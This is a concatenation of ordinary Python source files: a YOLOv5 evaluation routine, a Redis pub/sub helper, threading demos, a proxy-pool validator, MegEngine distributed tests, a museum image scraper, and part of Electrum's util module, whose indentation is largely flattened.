# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
val_batches = [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb.log({"Images": wandb_images, "Validation": val_batches}, commit=False)
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
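# Illustrative sketch of calling test() from a training loop instead of the CLI
# (`ema_model`, `val_loader` and `loss_fn` are assumed to be defined by the caller):
#
#     results, maps, times = test('data/coco128.yaml',
#                                 batch_size=32,
#                                 imgsz=640,
#                                 model=ema_model,        # model already on the target device
#                                 dataloader=val_loader,  # pre-built validation dataloader
#                                 save_dir=Path('runs/train/exp'),
#                                 plots=False,
#                                 compute_loss=loss_fn)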
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
queue.py
|
import json
import logging
import os
import threading
import time
# import gevent
import redis as Redis
from gevent import monkey
from rx import Observable
monkey.patch_all()
logger = logging.getLogger(__name__)
REDIS_URL = os.environ.get('REDIS_URL') or 'redis://localhost:6379'
REDIS_CHAN_MESSAGES = 'messages' # Todo use one redis channel per channel?
redis_client = Redis.from_url(REDIS_URL)
class RedisPubsubObservable:
def __init__(self, redis_url, redis_channel):
self._redis_url = redis_url
self._redis_channel = redis_channel
self._observable = None
def _connect(self):
"""Make sure connection is not shared across gevent thread thingies
"""
# return Redis.from_url(self._redis_url)
assert self._redis_url == REDIS_URL
return redis_client
def publish(self, data):
redis = self._connect()
redis.publish(self._redis_channel, json.dumps(data))
def get_observable(self):
logger.debug('GET OBSERVABLE [chan: {}]'
.format(self._redis_channel))
if not self._observable:
logger.debug('Create new observable')
self._observable = self.create_observable()
return self._observable
def create_observable(self):
# items = self.watch()
# return Observable.from_iterable(items)
def listen_to_redis_async(observable):
logger.debug('===> Starting Redis SUBSCRIBE thread')
def thread_callback():
logger.debug('THREAD CALLBACK STARTED')
redis = self._connect()
pubsub = redis.pubsub()
pubsub.subscribe(self._redis_channel)
for m in pubsub.listen():
if m['type'] != 'message':
logger.debug('<<< Redis pub/sub CTL: %s', repr(m))
continue
logger.debug('<<< Redis pub/sub MSG: %s', repr(m))
data = json.loads(m['data'])
observable.on_next(data)
logger.debug('>>> Redis pub/sub sent: %s', repr(data))
logger.debug('THREAD CALLBACK FINISHED')
t = threading.Thread(target=thread_callback)
            t.daemon = True
t.start()
# NOTE: the function will be called for every new subscriber,
# creating more and more threads listening to Redis.
# We actually want to somehow share events coming from the *one*
# thread attached to Redis...
obs = Observable.create(listen_to_redis_async)
obs = obs.publish()
obs.connect()
return obs
messages_queue = RedisPubsubObservable(REDIS_URL, REDIS_CHAN_MESSAGES)
def send_message(message):
messages_queue.publish({
'id': message.id,
# 'timestamp': message.timestamp,
# 'user_id': message.user_id,
'channel': message.channel,
'text': message.text,
})
def get_watch_observable(channel):
return (
messages_queue
.get_observable()
.filter(lambda msg: msg['channel'] == channel))
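# Illustrative usage sketch (assumes a Redis server reachable at REDIS_URL and a
# `message` object exposing id/channel/text attributes; nothing here is executed):
#
#     get_watch_observable('general').subscribe(lambda msg: print('received', msg))
#     send_message(message)  # every subscriber watching channel 'general' receives it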
|
t4.py
|
import time
from threading import Thread
def sleepMe(i):
print("Thread %i gonna to sleep for 8 seconds." % i)
time.sleep(8)
print("Thread %i woke up." % i)
for i in range(10):
th = Thread(target=sleepMe, args=(i, ))
th.start()
|
schedule.py
|
import time
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
except ImportError:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
test_api = TEST_API
def __init__(self):
self._raw_proxies = None
self._usable_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
    # implements asynchronous proxy checking
async def test_single_proxy(self, proxy):
"""
        test one proxy; if valid, put it into usable_proxies.
"""
try:
async with aiohttp.ClientSession() as session:
try:
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'http://' + proxy
print('Testing', proxy)
async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response:
if response.status == 200:
self._conn.put(proxy)
print('Valid proxy', proxy)
except (ProxyConnectionError, TimeoutError, ValueError):
print('Invalid proxy', proxy)
except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s:
print(s)
pass
def test(self):
"""
aio test all proxies.
"""
print('ValidityTester is working')
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print('Async Error')
class PoolAdder(object):
"""
add proxy to pool
"""
def __init__(self, threshold):
self._threshold = threshold
self._conn = RedisClient()
self._tester = ValidityTester()
        self._crawler = FreeProxyGetter()  # crawler that fetches proxies from public free-proxy sites
def is_over_threshold(self):
"""
        Check whether the number of stored proxies has reached the threshold.
"""
if self._conn.queue_len >= self._threshold:
return True
else:
return False
def add_to_queue(self):
print('PoolAdder is working')
proxy_count = 0
while not self.is_over_threshold():
for callback_label in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_label]
raw_proxies = self._crawler.get_raw_proxies(callback)
# test crawled proxies
self._tester.set_raw_proxies(raw_proxies)
self._tester.test()
proxy_count += len(raw_proxies)
if self.is_over_threshold():
print('IP is enough, waiting to be used')
break
if proxy_count == 0:
raise ResourceDepletionError
class Schedule(object):
@staticmethod
def valid_proxy(cycle=VALID_CHECK_CYCLE):
"""
        Re-test half of the proxies currently stored in Redis.
"""
conn = RedisClient()
tester = ValidityTester()
while True:
print('Refreshing ip')
count = int(0.5 * conn.queue_len)
if count == 0:
print('Waiting for adding')
time.sleep(cycle)
continue
raw_proxies = conn.get(count)
tester.set_raw_proxies(raw_proxies)
tester.test()
time.sleep(cycle)
@staticmethod
def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
upper_threshold=POOL_UPPER_THRESHOLD,
cycle=POOL_LEN_CHECK_CYCLE):
"""
        If the number of proxies is below lower_threshold, add more proxies.
"""
conn = RedisClient()
adder = PoolAdder(upper_threshold)
while True:
if conn.queue_len < lower_threshold:
adder.add_to_queue()
time.sleep(cycle)
def run(self):
        print('IP processing running')
        valid_process = Process(target=Schedule.valid_proxy)  # re-validate proxies already in the pool
        check_process = Process(target=Schedule.check_pool)   # top up the pool when it runs low
valid_process.start()
check_process.start()
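# Hedged launch sketch (not part of the original module): Schedule.run() starts
# both worker processes and returns immediately; the processes are not daemonic,
# so they keep running on their own.
def _example_main():
    """Start the proxy-pool scheduler (demo only)."""
    Schedule().run()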
|
test_util.py
|
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
from time import sleep
import pytest
import megengine as mge
import megengine._internal as mgb
import megengine.distributed as dist
_LOCALHOST = "127.0.0.1"
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
def _init_process_group_wrapper(world_size, rank, dev, backend, q):
if rank == 0:
dist.init_process_group(_LOCALHOST, 0, world_size, rank, dev, backend)
q.put(dist.get_master_port())
else:
port = q.get()
dist.init_process_group(_LOCALHOST, port, world_size, rank, dev, backend)
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_create_mm_server():
def worker():
if not mge.is_cuda_available():
return
port = mgb.config.create_mm_server("0.0.0.0", 0)
assert port > 0
res = mgb.config.create_mm_server("0.0.0.0", port)
assert res == -1
p = mp.Process(target=worker)
p.start()
p.join(10)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_init_process_group():
world_size = 2
def worker(rank, backend, q):
if not mge.is_cuda_available():
return
_init_process_group_wrapper(world_size, rank, rank, backend, q)
assert dist.is_distributed() == True
assert dist.get_master_ip() == _LOCALHOST
assert dist.get_master_port() > 0
assert dist.get_world_size() == world_size
assert dist.get_rank() == rank
assert dist.get_backend() == backend
def check(backend):
Q = mp.Queue()
p0 = mp.Process(target=worker, args=(0, backend, Q))
p1 = mp.Process(target=worker, args=(1, backend, Q))
p0.start()
p1.start()
p0.join(10)
p1.join(10)
assert p0.exitcode == 0 and p1.exitcode == 0
check("nccl")
check("ucx")
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
ip = "127.0.0.1"
backend = "nccl"
def worker(rank, q):
if not mge.is_cuda_available():
return
_init_process_group_wrapper(world_size, rank, rank, backend, q)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
p0 = mp.Process(target=worker, args=(0, Q))
p1 = mp.Process(target=worker, args=(1, Q))
p0.start()
p1.start()
p0.join(10)
p1.join(10)
assert p0.exitcode == 0 and p1.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
backend = "nccl"
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
if not mge.is_cuda_available():
return
_init_process_group_wrapper(world_size, rank, rank, backend, q)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
p0 = mp.Process(target=worker, args=(0, Q))
p1 = mp.Process(target=worker, args=(1, Q))
p0.start()
p1.start()
p0.join(10)
p1.join(10)
assert p0.exitcode == 0 and p1.exitcode == 0
|
get_images_and_info.py
|
import os
import time
import pickle
import shutil
import requests
from requests_html import HTMLSession
from threading import Lock, Thread
from tqdm import tqdm
vase_fname = 'data/raw/vase_links_all.txt'
info_fname = 'data/raw/vase_info.pkl'
n_vases = 25610 # may change if file above is regenerated
def requests_setup():
session = HTMLSession()
return session
def download_img(url, fname):
img_data = requests.get(url, stream=True)
img_data.raw.decode_content = True
with open(fname, 'wb') as img_f:
shutil.copyfileobj(img_data.raw, img_f)
del img_data
def get_img_info_thread(url):
img_id = int(url.split('/')[-1])
    # uncomment this and the download_img call below if you want everything in one loop;
    # keeping the two passes separate slows the request rate down a bit
# img_fname = f'data/raw/vase_imgs/{img_id}.jpg'
# if os.path.exists(img_fname):
# return
    # splitting info scraping and image downloads into separate passes
    # halves the load placed on the server at any one time;
    # the number of concurrent threads is also capped in __main__
if img_id not in all_info:
session = requests_setup()
r = session.get(url)
imgs = r.html.find('.artwork__image')
# make sure there's just one so there's no ambiguity
try:
assert len(imgs) == 1
except AssertionError:
return
src = imgs[0].attrs['src']
# download_img(src, img_fname)
info_section = r.html.find('.artwork-info')[0]
keys = info_section.find('.artwork__tombstone--label')
vals = info_section.find('.artwork__tombstone--value')
keys = [key.text[:-1] for key in keys]
vals = [val.text for val in vals]
img_info = dict(zip(keys, vals))
img_info['src'] = src
# also get image description
img_desc_section = r.html.find('.artwork__intro__desc')
desc = img_desc_section[0].find('p')[0].text
img_info['description'] = desc
# input(img_info)
facets = r.html.find('.artwork__facets')
# also get more metadata, but set defaults if they don't exist
locations = []
era = ''
for facet in facets:
facet_label = facet.find('.artwork__facets--label')
if not facet_label:
continue
elif 'Object Type' in facet_label[0].text:
categories = facet.find('a')
categories = [' '.join(c.text.split()[:-1]) for c in categories]
elif 'Geographic' in facet_label[0].text:
locations = facet.find('a')
locations = [' '.join(l.text.split()[:-1]) for l in locations]
elif 'Date / Era' in facet_label[0].text:
era = facet.find('a')[0]
era = ' '.join(era.text.split()[:-1])
img_info['categories'] = categories
img_info['location'] = locations
img_info['era'] = era
with all_info_lock:
all_info[img_id] = img_info
else:
pass
# print('skipping populated ID', img_id)
def get_img_thread(url):
img_id = int(url.split('/')[-1])
img_fname = f'data/raw/vase_imgs/{img_id}.jpg'
if os.path.exists(img_fname):
return
if img_id in all_info:
src = all_info[img_id]['src']
download_img(src, img_fname)
else:
pass
# print('skipping unpopulated ID', img_id)
if __name__ == '__main__':
if os.path.exists(info_fname):
with open(info_fname, 'rb') as f:
all_info = pickle.load(f)
else:
all_info = dict()
all_info_lock = Lock()
threads = list()
# make list of thread targets to run sequentially
# parameters are [target, whether_to_run, max_threads]
thread_targets = list()
thread_targets.append([get_img_info_thread, True, 32])
thread_targets.append([get_img_thread, True, 10])
for thread_target, do_run, max_threads in thread_targets:
if do_run:
with open(vase_fname, 'r') as f_links:
for line in tqdm(f_links, total=n_vases):
url = line.strip() # trim newline
# thread_target(url) # for testing
t = Thread(target=thread_target, args=(url,))
t.start()
threads.append(t)
if len(threads) >= max_threads:
for t in threads:
t.join()
threads = []
for t in threads:
t.join()
if thread_target == get_img_info_thread:
with open(info_fname, 'wb') as f:
pickle.dump(all_info, f)
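# Hedged alternative (demo only, not used above): the batched start/join pattern
# caps concurrency manually; a ThreadPoolExecutor gives the same cap with less
# bookkeeping. `thread_target`, `urls`, and `max_threads` are placeholders.
def _run_with_pool(thread_target, urls, max_threads):
    """Run thread_target over urls with at most max_threads concurrent workers."""
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        list(pool.map(thread_target, urls))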
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
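# Hedged usage sketch for the profiler decorator above (demo only): each call
# prints a line like "[profiler] _slow_op 0.5003" via print_error.
@profiler
def _slow_op(seconds=0.5):
    """Sleep briefly so the profiler has something to measure."""
    import time
    time.sleep(seconds)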
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    Cast a string to a bytes-like object; bytearray input is copied to bytes for Python 2 support.
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh_builder = lambda x: bytes.fromhex(x)
def hfu(x):
"""
py2-py3 aware wrapper for str.encode('hex')
:param x: str
:return: str
"""
assert_bytes(x)
return binascii.hexlify(x)
def bfh(x):
"""
py2-py3 aware wrapper to "bytes.fromhex()" func
:param x: str
:rtype: bytes
"""
if isinstance(x, str):
return bfh_builder(x)
# TODO: check for iterator interface
elif isinstance(x, (list, tuple, map)):
return [bfh(sub) for sub in x]
else:
raise TypeError('Unexpected type: ' + str(type(x)))
def bh2u(x):
"""
unicode with hex representation of bytes()
e.g. x = bytes([1, 2, 10])
bh2u(x) -> '01020A'
:param x: bytes
:rtype: str
"""
assert_bytes(x)
return binascii.hexlify(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
